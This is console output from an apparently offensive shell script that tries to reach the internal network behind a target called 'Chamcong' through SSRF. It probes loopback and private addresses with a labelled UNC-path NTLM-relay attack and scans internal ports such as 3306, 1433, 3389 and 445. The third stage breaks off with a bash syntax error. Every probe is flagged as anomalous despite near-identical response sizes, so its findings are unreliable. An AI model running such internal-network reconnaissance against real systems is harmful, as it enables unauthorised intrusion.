━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🎯 新思路：通过Chamcong打内网
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

[攻击1] SSRF扫描内网 - UNC路径（NTLM Relay）
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  策略: 让服务器访问内网IP，探测存活主机

  测试内网IP: 127.0.0.1
    响应时间: 516ms, 大小: 8048 bytes
    🔥 响应异常！可能有交互！
  测试内网IP: localhost
    响应时间: 515ms, 大小: 8048 bytes
    🔥 响应异常！可能有交互！
  测试内网IP: 192.168.1.1
    响应时间: 533ms, 大小: 8058 bytes
    🔥 响应异常！可能有交互！
  测试内网IP: 192.168.0.1
    响应时间: 502ms, 大小: 8058 bytes
    🔥 响应异常！可能有交互！
  测试内网IP: 10.0.0.1
    响应时间: 795ms, 大小: 8043 bytes
    🔥 响应异常！可能有交互！
  测试内网IP: 172.16.0.1
    响应时间: 496ms, 大小: 8053 bytes
    🔥 响应异常！可能有交互！
  测试内网IP: 192.168.1.100
    响应时间: 543ms, 大小: 8068 bytes
    🔥 响应异常！可能有交互！
  测试内网IP: 192.168.1.10
    响应时间: 516ms, 大小: 8063 bytes
    🔥 响应异常！可能有交互！

[攻击2] HTTP SSRF扫描内网服务
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  测试内网HTTP服务...

  测试: http://127.0.0.1:80
    🔥 响应异常: 7765 bytes（可能有服务）
  测试: http://127.0.0.1:8080
    🔥 响应异常: 7765 bytes（可能有服务）
  测试: http://127.0.0.1:3306
    🔥 响应异常: 7765 bytes（可能有服务）
  测试: http://127.0.0.1:1433
    🔥 响应异常: 7765 bytes（可能有服务）
  测试: http://127.0.0.1:3389
    🔥 响应异常: 7765 bytes（可能有服务）
  测试: http://127.0.0.1:445
    🔥 响应异常: 7765 bytes（可能有服务）
  测试: http://192.168.1.1:80
    🔥 响应异常: 7765 bytes（可能有服务）
  测试: http://192.168.1.100:80
    🔥 响应异常: 7765 bytes（可能有服务）
  测试: http://10.0.0.1:80
    🔥 响应异常: 7765 bytes（可能有服务）

[攻击3] 通过错误信息探测内网
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  策略: 利用详细错误信息获取内网信息

SSRF_INTERNAL_NETWORK.sh: line 157: syntax error near unexpected token `done'
SSRF_INTERNAL_NETWORK.sh: line 157: `done'
